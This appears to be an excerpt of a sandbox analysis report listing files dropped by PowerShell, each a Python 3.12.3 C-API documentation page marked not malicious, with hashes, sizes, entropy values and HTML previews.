                                                                                                    SSDEEP:1536:6qyVMoJ4eiCHJPh3JyeiCHJfJ5eiCHJeJ0eJWeJqiJzeCJJeJ0eJWeJqoV+JweiM:+o/Vg
                                                                                                    MD5:0712766986B78D381D34B8021D93B7FE
                                                                                                    SHA1:D7BB2D46C4A6BD851FC8D01B3459DAF3DE2DAEC7
                                                                                                    SHA-256:CDC979588A09B5E96D8619B604A956BC84BB62A0216E341B273B31F0AFE6F7CD
                                                                                                    SHA-512:C7A3E84331620C6CBE87669E8BFDF43F9A8811852F817DEA41A50FDD7D9ACAA2C4F970320897821CD144CB87E45CB50F685AFED9D0A10E47D1D321BFCADFB430
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Importing Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/import.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Importing Modules &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26042
                                                                                                    Entropy (8bit):4.882844562211637
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:4rcHqklhkOnVTM9R/lQIdgXt4+xH1JKnZTMe76dqEC:NqyhlRMn28NMe764N
                                                                                                    MD5:01F9F6A10A3E316293E9EF2BE36B2977
                                                                                                    SHA1:8274BA10F8C4013738B92B192F7CC92592D3B470
                                                                                                    SHA-256:2194919538FAC4D36A0FE09D2A8F2C2A595AC7B97E00AD27AB0839DC0E77A16C
                                                                                                    SHA-512:850F7E723C8557F60976A718E7887CD3BD2D94787B9AEE5A66AECD32BDCBFD324300EA672A3753E515D2C719BA6CF051E75A5BB71AD3BF9521AE8B76A6AB1FC1
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python/C API Reference Manual" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This manual documents the API used by C and C++ programmers who want to write extension modules or embed Python. It is a companion to Extending and Embedding the Python Interpreter, which describes..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This manual documents the API used by C and C++ program
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (882), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):279279
                                                                                                    Entropy (8bit):4.890356416578371
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:sNDeuxn1qGCQ86XV0isJuokoM0+haHNb20+dBZ+Tb+95jml7g:dg
                                                                                                    MD5:5335A2D0DD436B3A936BD02C622D5C9E
                                                                                                    SHA1:5AA19F1E5613E77C7536F35D1A049A72CD6FAD6B
                                                                                                    SHA-256:315CE2E5E6136DBF1BA4CD5C2A0F4663ED208D825EEF9BDE9D5F3516A99310DD
                                                                                                    SHA-512:26FF7D1ABEC21EB691A5631EEF195A1834D8DCDD4EBAF712FEE142BE75FFDC8B876F66D889B30FD986D5687B32EA046A83DFD56FD5D6F848A5495CB56A2CB8F4
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Initialization, Finalization, and Threads" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/init.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also Python Initialization Configuration. Before Python Initialization: In an application embedding Python, the Py_Initialize() function must be called before using any other Python/C API funct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also Python Initialization Configuration
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1218), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):228040
                                                                                                    Entropy (8bit):4.84968154443352
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:FqyMMBkkeoheMJOe5HF6AeMJOrZe5HFzjeyHMie9weH4eECH/ewCHaeVver4TeiF:t2eIixtLRD5t5z14q92g
                                                                                                    MD5:B352AFA08B6AAD5FA2A57A365A5F58BD
                                                                                                    SHA1:55E6F710AAB95B5FB65C010A523FA9791DA1801D
                                                                                                    SHA-256:39711E0FF96C99A885C2E30DFDFB24CED3C3B333164C0D33CA2EAA216459F185
                                                                                                    SHA-512:9B21E1367D3DF27953A06EA33FE9D1872941DDAE6B081C1338DA74762838C8D005EED64C586790F83A437B1F87D5CCA117A91B84DFC4794684E766ED85372C27
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Initialization Configuration" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/init_config.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python can be initialized with Py_InitializeFromConfig() and the PyConfig structure. It can be preinitialized with Py_PreInitialize() and the PyPreConfig structure. There are two kinds of configura..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python can be initialized with Py_Initializ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (626), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106771
                                                                                                    Entropy (8bit):4.859201129994066
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:GGYqy1M+0hte+WnEecneDiep2e4fDeZaecjReGAuecjVenlecseTWeMweBXQcbep:GGW0/SB4Fl/qkXLzyWeggag
                                                                                                    MD5:A7EAE0AF8AEED9287CD40553A9FCB0B4
                                                                                                    SHA1:ECB2BF6B24A06BBB530FC9192E13C34E5D104919
                                                                                                    SHA-256:1CC1227EC4DAA4C12D6D6783A0BD93479F2C65ECF6E22D4DF734D824F576665D
                                                                                                    SHA-512:1A6943D815B4F5A5043CB92C51D8AD31DEAF13C4FBCE962E8A9DEFBFAB2AEA41DEDA61D5E3E25B24DD1BEAEC51FD0444A3DF21285BD61E868FAAB96CF9C4FBF0
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Introduction" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/intro.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Application Programmer.s Interface to Python gives C and C++ programmers access to the Python interpreter at a variety of levels. The API is equally usable from C++, but for brevity it is gener..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The Application Programmer.s Interface to Python gives C and C++ pro
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1269), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22462
                                                                                                    Entropy (8bit):4.867850146969797
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:6HqklZOgn2TMmreIVJlsieIVJlZcVJNeIVJlszkiBYhHFNelILeIVJMEVJkEVJMw:OqyZBcMmreCJlsieCJlwJNeCJlWbBYh/
                                                                                                    MD5:E3C31E23767226555F438B0D0F105B87
                                                                                                    SHA1:538FB61B5DA0671ECD91A181A4D9D630127972A7
                                                                                                    SHA-256:A328EA7B34488C00ED1DBF7F326E3D4719CCD7CFEC7C89C8A04A0BC782A2DCCA
                                                                                                    SHA-512:AD8B76CE307098B155B47517075F5AF06791F8BB6C1D81A84F521659109602EE5C174C522C06F0AB946BCB89238365BF0ABD2BCECC9922BC4ABC8B77FD8C4629
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Iterator Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/iter.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are two functions specifically for working with iterators. To write a loop which iterates over an iterator, the C code should look something like this:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are two functions specifically for working with iterators. To write a loop which iterates over an iterato
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1016), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20665
                                                                                                    Entropy (8bit):4.891099591900654
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:qYsHqkl5KonaTM8VD2exWeIVJ93VJreIVJrZ0DheI7eIVJ9OVJUeIVJyEVJatYoP:qYQqy5b4M8h2exWeCJ9lJreCJrZmheIe
                                                                                                    MD5:1D73062207865B5516A43A0578D7D724
                                                                                                    SHA1:61EDB1ED38B1DB40840EEE6B6A338FE317EFD5DA
                                                                                                    SHA-256:5CB407E5E9E7548B280036951503FD7C7E556DEB153206A5866A2264AEBB478D
                                                                                                    SHA-512:585E9522C74F59EEFFA0494AA68C82137272F6129454AD548D1491123F5E46D3DD3FCF52AE4A8B4806DE1EA1480F0D6E66CDFFC09D860E2A4AFD6852277B08DD
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Iterator Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/iterator.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python provides two general-purpose iterator objects. The first, a sequence iterator, works with an arbitrary sequence supporting the__getitem__() method. The second works with a callable object an..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python provides two general-purpose iterator objects. The first,
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1315), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38118
                                                                                                    Entropy (8bit):4.855039623443231
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:+qyRt0M0ZePXeh9eCJsCCeCJsNJWeP2V6eCJOUfeCJO+JfeCJOrZsJYeCJOrSM2P:+qyQM0ZePXeh9eCJsCCeCJsNJWeP2V64
                                                                                                    MD5:64A4967382B9586728095F62947076C9
                                                                                                    SHA1:08C160C87AF093DB6AA296AA605E573078D6CE07
                                                                                                    SHA-256:CA8B3F7FA2FEA9133E628038C1DA11A18DAA768AE02EB4AA03C2E8D25C449C4A
                                                                                                    SHA-512:3BBB50B16CE7F6B0D7A49F329E5D6679089F5A9AE3FC616C7FACC9F49378951447B00963E6EFC87A561566CAB11303C71BA56618EA03B6E18351CD0434447C91
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="List Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/list.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>List Objects &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_static
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1093), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72564
                                                                                                    Entropy (8bit):4.8669890321048666
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:qqyqMTyredZebPeCJsp8eCJs0Jievx/VJdeiExAcJ1ePPvJ+e0xJJsevExI6JreU:kFg
                                                                                                    MD5:E4052F22EB7520397F2F0CB422DF43E8
                                                                                                    SHA1:A8B575C2D6D01347C134DFC759A33EA3B4FE08DF
                                                                                                    SHA-256:9EB760BD665F2F475C64AE01161C003D10E141B823704616ED0C283A00886EFC
                                                                                                    SHA-512:FF1FD1D746CBF347948B7599970127A52A156029A3C22B1145780053D0326675A095DC2F476C9D50180C6CA31E7CD45B758EBAD322F6A86142AF6EF93C658C9B
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Integer Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/long.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="All integers are implemented as .long. integer objects of arbitrary size. On error, most PyLong_As* APIs return(return type)-1 which cannot be distinguished from a number. Use PyErr_Occurred() to d..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="All integers are implemented as .long. integer objects of arbi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1138), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32689
                                                                                                    Entropy (8bit):4.876693781272095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:aqyJZ4M15eCJleGeCJluPeCJlHJoeCJleCHrkSH7eCJleCHreJSiSP3eCJleJrlR:aqygM15eCJleGeCJluPeCJlHJoeCJleL
                                                                                                    MD5:5B5A0C20BF99C44DB6DB0B7E5CB2B217
                                                                                                    SHA1:946218CB5B0EF8CCCB126F76147CCBD0DA15745E
                                                                                                    SHA-256:0CFB6374AF1AB7F3759A3F387283CEC14878D40F613792D51682F83802CDE039
                                                                                                    SHA-512:31455CF41F996F7F4A24C30B2EB9D5932868D579A39451C794A50733134B02C1D495D095B016C3D94DE9048F1030DAA9B8886C7A5F1E0885B6FD04B847D2F4C2
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Mapping Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/mapping.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also PyObject_GetItem(), PyObject_SetItem() and PyObject_DelItem()." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also PyObject_GetItem(), PyObject_SetItem() and PyObject_DelItem()." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (980), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27348
                                                                                                    Entropy (8bit):4.882288409260469
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:LuxqyR8zMH0XevKUHAobNMqeeCJBUHAobPaJGeCJBobqZeYHAuq+aTleYHA8q+a+:WqyMMUXevKUHAobNMqeeCJBUHAobPaJx
                                                                                                    MD5:34AE2B3BF34417AB6BCBCDF6D54D2650
                                                                                                    SHA1:AED9721711F9115E6239A7AEC6984062EF76D485
                                                                                                    SHA-256:D8ED281E602DC2E3CF261E722D4D0366C7D791D013BE125B29C04A1C0C724126
                                                                                                    SHA-512:1ADDC73E3394FBF4C2D261A6F6D6119A196A4E22C406BB91E6D7F161B32764F2DCDA5965AC6D71BDC4E18A2254A5491D90051B2FCD556E7006F7248C73FEA97E
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Data marshalling support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/marshal.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These routines allow C code to work with serialized objects using the same data format as the marshal module. There are functions to write data into the serialization format, and additional functio..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These routines allow C code to work with serialized object
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (867), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):101591
                                                                                                    Entropy (8bit):4.904770652791002
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:mqy9MkeUcFHTe0ZsrHFe0mQXw2DZL5bHRerHsQZ1CerHsQ0Hde0ZLnHbe0mQXn2b:tUcO1Cz16T1dsdqrG4g
                                                                                                    MD5:E7A109EEAEE6A04D2B153ADD299BF0EF
                                                                                                    SHA1:C5732E0431F612E6A76688C2705E61F88BEB1D29
                                                                                                    SHA-256:A75E8E0DFE8A657E47FE4EE6478C4DB12BC122167754B7368DFFB2283D40C264
                                                                                                    SHA-512:397B18447F846E8EB8EE7D84D231B1EAEE1FF9A9F79E8F5DCF7FA2398FDC041CBBEBA57C89AE2408BEDD7D1383E35E7C13962AD329A079AFF1EA5791FBAED7BB
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Memory Management" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/memory.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Overview: Memory management in Python involves a private heap containing all Python objects and data structures. The management of this private heap is ensured internally by the Python memory manag..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Overview: Memory management in Python involves a private heap cont
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1031), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24626
                                                                                                    Entropy (8bit):4.951601243376123
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:AqyLJMMqJjeCJp20eqeuJXe9HxrYoEQJWeixJ38iZJyeCJpoZZv8PHeCJpZJbeC+:AqyiMqJjeCJp20eqeuJXe9HxrYoEQJW/
                                                                                                    MD5:244D809BFB4BFA9ECC9361C29162D13D
                                                                                                    SHA1:0448CFD6C79901B82B6E8A100DEE779927AF2FDF
                                                                                                    SHA-256:AB57C79B33B47F78AA31E4A41A8CD5AF5AECAF39485338E32328098E3038240B
                                                                                                    SHA-512:1DB073C3DD566DB31EC42EAB69461A6CFB506D5CB9E849F46B4B11A0141F89D21D8D213267C59C1C8E2CA4C0006C4C8290FE3A3586CE2CB2EF16A5A4C97E0720
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="MemoryView objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/memoryview.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A memoryview object exposes the C level buffer interface as a Python object which can then be passed around like any other object." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A memoryview object exposes the C level buffer interface as a Python object which can then be passed around like any other object."
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1004), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27464
                                                                                                    Entropy (8bit):4.912250905283024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:3yqymCqTQM0tevjeCJlYJkeCJMlJceCJsMJxeCJsoMeh0eCJlFJ/eCJMeJwQJ5eD:CqyTM0tevjeCJlYJkeCJMlJceCJsMJxD
                                                                                                    MD5:1CF1AE28A1AE7EB927CE3558A61EB152
                                                                                                    SHA1:203AEABF6A59396D82C0F52A5D2E945FE58A445D
                                                                                                    SHA-256:60FB9CA8B9A006068AB1BB14B8D367407479C45D1593BED7CCDB1570A7B7AA71
                                                                                                    SHA-512:1A54AD79888434202F144E7849A0ADC714BC4614B4992F78CDDA2EF23CD300786019E86A85AD59A98A2D0C056BEE090F3D1C05773F2CA1404327DE2B6C80F57E
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Instance Method Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/method.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="An instance method is a wrapper for a PyCFunction and the new way to bind a PyCFunction to a class object. It replaces the former call PyMethod_New(func, NULL, class). Method Objects: Methods are b..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="An instance method is a wrapper for a PyCFunction and the ne
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1019), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105105
                                                                                                    Entropy (8bit):4.873253108646738
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:iqy5MQTevheCJsCOeCJsNJJeCJJuJWeiCHJvJ0eCJyG7JQeCJybCHfeCJywH/eCz:Fg
                                                                                                    MD5:4102859F18EB7FE49FD3247C6E2D132C
                                                                                                    SHA1:6F9B9B991025726136C26D626465F70D6354155F
                                                                                                    SHA-256:46F210E8AF5958292538FBF9CD3A158EFC04AD81A110D47421D5921843C9F4D8
                                                                                                    SHA-512:206FAD1D1D9296F5B2E9B463AAB58B099AF7C256EE5918CF012382530DB62E8B699EC810EF367E12807B084FCD26A39F3B8F667D5BEB3AF7595E849B37AA4CB3
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Module Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/module.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Initializing C modules: Modules objects are usually created from extension modules (shared libraries which export an initialization function), or compiled-in modules (where the initialization funct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Initializing C modules: Modules objects are usually created from exte
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (396), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15351
                                                                                                    Entropy (8bit):4.859041556775392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:0HqklBawnuTM+UVJMeOVgSeChXgn8TMi76dqEC:4qyBBEM+uJMeGgSeChwSMi764N
                                                                                                    MD5:13B5A9AEB89F18E1ECFEE8EF7D325601
                                                                                                    SHA1:972EC36277470B4DCFF3FDA5A6A0531B252BE8B2
                                                                                                    SHA-256:61DE1432B57FB12A5A5B84D8AA9E175C4E8A2A216CA801949AFAD2B68925F76B
                                                                                                    SHA-512:CEFAF7C7A87FA17E7B6E7B9EDE19BF76A9E7C2611E493303CEB3348A569204EF70123E74CE7074B3638227F774E7F62DF0C215D880C9933D87AE34D8D5225E5F
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The None Object" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/none.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Note that the PyTypeObject for None is not directly exposed in the Python/C API. Since None is a singleton, testing for object identity (using== in C) is sufficient. There is no PyNone_Check() func..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Note that the PyTypeObject for None is not directly exposed in the Pyt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1284), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78877
                                                                                                    Entropy (8bit):4.814032396933495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:0qypMW0eCJlAJmeCJSeJz/J9eCJSeJzOJxeCJSeJz7JUeCJSeJzGJmeCJSeJzhJx:sg
                                                                                                    MD5:5340186F78D90746313F4626B2C9609F
                                                                                                    SHA1:D33204253F9C5DAFFD322D19B978A362B116D7BB
                                                                                                    SHA-256:18540D4DE6E149F274A359865D7A13BC10ABC27475F8EF4A7892DED61A0D2F51
                                                                                                    SHA-512:AF2960E2A3589DB72507EAD4ABADE99EE8E1D833587F17F6B2CC209B19B8A4096E18E0CFDAA8CAAC0CF9B8D97AC27F56C1CB11C7B76B5C1AA403B2BF54F05B1A
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Number Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/number.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Number Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1198), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22448
                                                                                                    Entropy (8bit):4.887100931867726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:BHqklCrlnGTMob2qliMvtB2eIVJpeCHMcrJccB+eIVJpeMHMcrJc4BseIVJlkiMA:RqyChsMO2eCJpeCHMcrJcS+eCJpeMHMN
                                                                                                    MD5:C673B4DE41142E7D613D46C1BA601298
